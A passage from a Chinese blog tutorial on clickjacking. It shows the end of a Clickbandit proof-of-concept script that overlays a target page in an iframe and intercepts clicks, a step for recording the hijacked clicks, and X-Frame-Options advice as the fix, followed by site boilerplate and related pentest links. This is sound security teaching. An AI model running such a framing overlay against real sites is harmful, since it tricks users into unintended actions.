              css += 'background-image: linear-gradient(to bottom, #f4973a, #e06228);';
              css += '-webkit-border-radius: 10;';
              css += '-moz-border-radius: 10;';
              css += 'border-radius: 10px;';
              css += 'color: #ffffff;';
              css += 'font-size: 15px;';
              css += 'padding: 10px 10px 10px 10px;';
              css += 'text-decoration: none;';
              css += 'border: solid #ffa200 1px;';
              css += 'cursor:pointer;';
            css += '}';
            css += '.btn:hover {';
              css += 'background: #ffddba;';
              css += 'background-image: -webkit-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -moz-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -ms-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -o-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: linear-gradient(to bottom, #ffddba, #e06228);';
              css += 'text-decoration: none;';
            css += '}';
            css += 'h1 {';
            css += 'color:#585A5C;';
            css += 'margin:0;padding:0;';
            css += 'margin-top:10px;';
            css += 'margin-left:10px;';
            css += 'font-size:22pt;';
            css += 'border:none;';
            css += '}';
            css += 'h1 span {';
            css += 'color:#f4983b;';
            css += '}';
        return css;
    }
    function createStyles(doc, node) {
        var css = generateCssString(), style = doc.createElement('style');
        style.appendChild(doc.createTextNode(css));
        node.appendChild(style);
    }
    function ready() {
        var iframe = document.createElement('iframe');
        if(location.protocol === 'data:') {
            return false;
        }
        width = getDocWidth(document);
        height = getDocHeight(document);
        removeNodes(document.body);
        disableStyles();
        createStyles(document, document.body);
        createMenu(createHeader(document, document.body));
        iframe.style.width = width + 'px';
        iframe.style.height = height + 'px';
        iframe.style.position = 'relative';
        iframe.frameborder = 0;
        iframe.scrolling = 'no';
        iframe.style.border = 'none';
        iframe.id = 'clickbandit_frame';
        document.body.appendChild(iframe);
        iframe.onload = function() {
            win = this.contentWindow;
            doc = win.document;
            interceptClicks();
        };
    }
    window.clickbandit = {start: start, mode: 'record', finish: finish, version: "1.0.5", disableClickActions: false, sandbox: false};
    window.addEventListener('DOMContentLoaded', ready, false);
    if(document.readyState === 'complete') {
        ready();
    }
}();

6)点击start,然后在页面上点击几个功能模块,finish,就会发现页面已经被劫持点击劫持漏洞

 

3.修复建议

X-FRAME-OPTIONS是目前最可靠的方法。X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。
这个头有三个值:
DENY:拒绝任何域加载
SAMEORIGIN:允许同源域下加载
ALLOW-FROM:可以定义允许frame加载的页面地文章来源地址https://www.toymoban.com/news/detail-493284.html

到了这里,关于点击劫持漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 简单漏洞复现_网络渗透测试

    一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 获取easy file sharing server 链接:https://pan.baidu.com/s/1WRasVlAb_st--7ZeOkwNVQ  提取码:1vx1 主要步骤 1

    2024年02月05日
    浏览(59)
  • 渗透测试漏洞原理之---【组件安全】

    A9:2017-Using Components with Known Vulnerabilities A06:2021 – Vulnerable and Outdated Components 组件(例如:库、框架和其他软件模块)拥有和应用程序相同的权限。如果应用程序中含有已知漏洞的组件被攻击者利用,可能会造成严重的数据 丢失或服务器接管。同时,使用含有已知漏洞的组件

    2024年02月09日
    浏览(46)
  • 渗透测试漏洞原理之---【业务安全】

    1.1业务安全现状 1.1.1、业务逻辑漏洞 近年来,随着信息化技术的迅速发展和全球一体化进程的不断加快,计算机和⽹络已经成为与所有⼈都息息相关的⼯具和媒介,个⼈的⼯作、⽣活和娱乐,企业的管理,乃⾄国家的发展和改⾰都⽆处其外。信息和互联⽹带来的不仅仅是便利

    2024年02月09日
    浏览(41)
  • [渗透测试]—5.2 网络协议漏洞

    在这一章节中,我们将学习网络协议漏洞,如ARP欺骗、DNS欺骗等,并通过实例来讲解如何利用这些漏洞进行网络渗透测试。请放心,我们会尽量讲得详细、通俗易懂,并提供尽可能多的实例。 网络协议是计算机网络中设备之间通信的规则。然而,许多网络协议在设计时并未充

    2024年02月11日
    浏览(50)
  • 渗透测试--2.漏洞探测和利用

    目录 一.漏洞分类 二.漏洞探测 三.漏洞利用 四.漏洞扫描 1.Nessus 2.Web应用漏洞扫描器——DVWA 五.Metasploit漏洞利用 网络漏洞 系统漏洞 应用漏洞  人为不当配置 渗透测试是一种测试网络、应用程序和系统安全性的方法,旨在发现并利用漏洞和安全漏洞,以评估系统的安全性。

    2024年02月05日
    浏览(59)
  • web渗透测试漏洞复现:Elasticsearch未授权漏洞复现

    Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能

    2024年04月10日
    浏览(48)
  • 【渗透测试】Struts2系列漏洞

    🌷S2-001 🌼1、漏洞原理 🌼2、影响版本 🌼3、验证方法 🌷S2-005 🌼1、漏洞原理 🌼2、影响版本 🌼3、验证方法(无回显) 🌼4、验证方法(有回显) 🌷S2-007 🌼1、漏洞原理 🌼2、影响版本 🌼3、漏洞验证 🌷S2-008 🌼1、漏洞原理 🌼2、影响版本 🌼3、漏洞验证 🌷S2-009 🌼

    2023年04月09日
    浏览(44)
  • 【渗透测试】Apache Shiro系列漏洞

      🍨 Shiro-550(CVE-2016-4437) 🍦 1、漏洞原理 🍦 2、影响版本 🍦 3、漏洞利用 🍨 Shiro-721 🍦 1、漏洞原理 🍦 2、影响版本 🍦 3、漏洞利用 🍨 Shiro认证绕过漏洞(CVE-2020-1957) 🍦 1、漏洞原理 🍦 2、影响版本 🍦 3、漏洞验证 🍨 Shiro 身份验证绕过 (CVE-2020-13933) 🍦 

    2024年02月06日
    浏览(75)
  • 渗透测试工具——漏洞扫描工具

    技术原因 软件系统复杂性提高,质量难于控制,安全性降低 公用模块的使用引发了安全问题 经济原因 “柠檬市场”效应——安全功能是最容易删减的部分 环境原因 从传统的封闭、静态和可控变为开放、动态和难控 攻易守难 安全缺陷 安全性缺陷是信息系统或产品自身“与

    2023年04月09日
    浏览(53)
  • [渗透测试]—3.3 漏洞评估和报告编写

    在渗透测试过程中,漏洞评估和报告编写是非常重要的环节。漏洞评估可以帮助你确定哪些漏洞更加关键,需要优先修复。而报告则是向客户或公司领导展示渗透测试结果的关键文档。本节将介绍漏洞评估和报告编写的基本概念、方法和要点。 漏洞评估是对已发现的安全漏洞

    2024年02月15日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包